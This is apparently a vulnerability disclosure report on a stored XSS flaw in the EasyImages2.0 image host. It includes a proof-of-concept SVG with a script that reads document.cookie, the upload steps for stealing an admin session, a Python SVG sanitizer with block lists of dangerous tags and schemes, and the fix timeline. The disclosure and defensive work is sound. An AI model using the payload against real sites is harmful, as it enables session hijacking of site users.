Stored XSS vulnerability exists in the simple image host icret/easyimages2.0

Valid

Reported on

Mar 2nd 2023


Description

A stored XSS vulnerability exists in the simple image host: by constructing a malicious SVG file and luring the administrator to open it, the administrator's cookie can be stolen.

Proof of Concept

Create an SVG file with the following content:

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">

<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<rect width="300" height="100" style="fill:rgb(0,0,255); stroke-width:3; stroke:rgb(0,0,0)" />
<script type="text/javascript">
alert(document.cookie);
</script>
</svg>

Administrator cookies can be stolen. No login is required to upload SVG files from the home page. To demonstrate the theft of the administrator's cookie:

1. Set up a local environment and log in as the administrator.
2. Upload the SVG XSS payload constructed above to the image host.
3. When the uploaded SVG is opened, the XSS cookie theft is triggered.
4. The cookie is successfully obtained.

Impact

Steal or tamper with application cookies for session hijacking
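The root cause is that the image host accepts SVG uploads without checking for active content and then serves them inline, so the `<script>` element above runs in the site's origin. The following server-side check is an added example written for this report; it is not EasyImages2.0 code and does not reproduce the project's fix commit. It assumes the upload handler can call `svg_violations()` before storing a file (to reject it) or `sanitize_svg()` (to strip active content instead); the function names, the tag/attribute allow-lists and the extra sample inputs are this example's own choices.

```python
"""Server-side check for uploaded SVG files that carry active content.

Added illustration for this report (hypothetical, not EasyImages2.0 code).
svg_violations() lists why an upload should be rejected; sanitize_svg()
strips the offending parts instead. Both use only the standard library.
"""
import xml.etree.ElementTree as ET

SVG_NS = "http://www.w3.org/2000/svg"
XLINK_NS = "http://www.w3.org/1999/xlink"
ET.register_namespace("", SVG_NS)          # keep <svg>, <rect> unprefixed on output
ET.register_namespace("xlink", XLINK_NS)

# Elements that run script or embed HTML/external documents when rendered.
DANGEROUS_TAGS = {"script", "foreignobject", "iframe", "embed", "object", "animate", "set"}
# URL schemes that execute script or smuggle markup through href/src/style.
DANGEROUS_SCHEMES = ("javascript:", "vbscript:", "data:")
URL_ATTRS = {"href", "src", "style"}

# The payload from this report, reformatted, used as the sample input below.
REPORT_POC = b"""<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<rect width="300" height="100" style="fill:rgb(0,0,255); stroke-width:3; stroke:rgb(0,0,0)" />
<script type="text/javascript">
alert(document.cookie);
</script>
</svg>"""


def _local(qname: str) -> str:
    """'{http://www.w3.org/2000/svg}script' -> 'script' (namespace stripped)."""
    return qname.rsplit("}", 1)[-1].lower()


def _attr_is_dangerous(tag: str, name: str, value: str) -> str:
    """Return a reason if this attribute can execute script, else ''."""
    if name.startswith("on"):                      # onload=, onclick=, ...
        return f"event handler {name}= on <{tag}>"
    # Browsers ignore tabs/newlines inside a scheme, so compare whitespace-free.
    compact = "".join(value.split()).lower()
    if name in URL_ATTRS and any(s in compact for s in DANGEROUS_SCHEMES):
        return f"{name}= on <{tag}> uses a script/data URL"
    if tag == "use" and name == "href" and not compact.startswith("#"):
        return f"<use> references an external document via {name}="
    return ""


def svg_violations(data: bytes) -> list:
    """List the reasons an SVG upload should be rejected; empty means clean."""
    try:
        root = ET.fromstring(data)   # expat does not fetch the external DTD
    except ET.ParseError as exc:
        return [f"not well-formed XML: {exc}"]
    if _local(root.tag) != "svg":
        return [f"root element is <{_local(root.tag)}>, not <svg>"]
    problems = []
    for el in root.iter():
        tag = _local(el.tag)
        if tag in DANGEROUS_TAGS:
            problems.append(f"<{tag}> element")
        for attr, value in el.attrib.items():
            reason = _attr_is_dangerous(tag, _local(attr), value)
            if reason:
                problems.append(reason)
    return problems


def sanitize_svg(data: bytes) -> bytes:
    """Strip dangerous elements and attributes, then re-serialise the SVG."""
    root = ET.fromstring(data)
    if _local(root.tag) != "svg":
        raise ValueError("not an SVG document")
    parents = {child: parent for parent in root.iter() for child in parent}
    for el in list(root.iter()):                   # snapshot: the tree is mutated
        tag = _local(el.tag)
        if tag in DANGEROUS_TAGS:
            parents[el].remove(el)
            continue
        for attr in list(el.attrib):
            if _attr_is_dangerous(tag, _local(attr), el.attrib[attr]):
                del el.attrib[attr]
    return ET.tostring(root, encoding="utf-8", xml_declaration=True)


if __name__ == "__main__":
    print("violations:", svg_violations(REPORT_POC))
    print(sanitize_svg(REPORT_POC).decode())
```

Rejecting is the simpler policy for an image host; sanitising keeps the drawing but must be repeated whenever the block-lists grow. Independently of either, uploaded SVGs should be served with `Content-Disposition: attachment` or under a restrictive `Content-Security-Policy` so a bypass cannot run script in the site's origin, and the session cookie should be flagged `HttpOnly` so `document.cookie` does not expose it.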

We are processing your report and will contact the icret/easyimages2.0 team within 24 hours. 20 days ago
We have contacted a member of the icret/easyimages2.0 team and are waiting to hear back 19 days ago
NCNIPC梅苑 modified the report 19 days ago
icret validated this vulnerability 19 days ago

Thank you for your feedback. I hope you can continue to pay attention to the code. Thanks again!

NCNIPC梅苑 has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
NCNIPC梅苑 (Researcher), 18 days ago:

This bug has been fixed in the new version (https://github.com/icret/EasyImages2.0/commit/3434282bbb342966d9dfe256108f9f1d0eb97d34). Can I apply for a CVE number?

NCNIPC梅苑 (Researcher), 18 days ago:

@admin

icret marked this as fixed in 2.6.7 with commit 95a6ca 17 days ago
icret has been awarded the fix bounty
This vulnerability has been assigned a CVE
icret published this vulnerability 17 days ago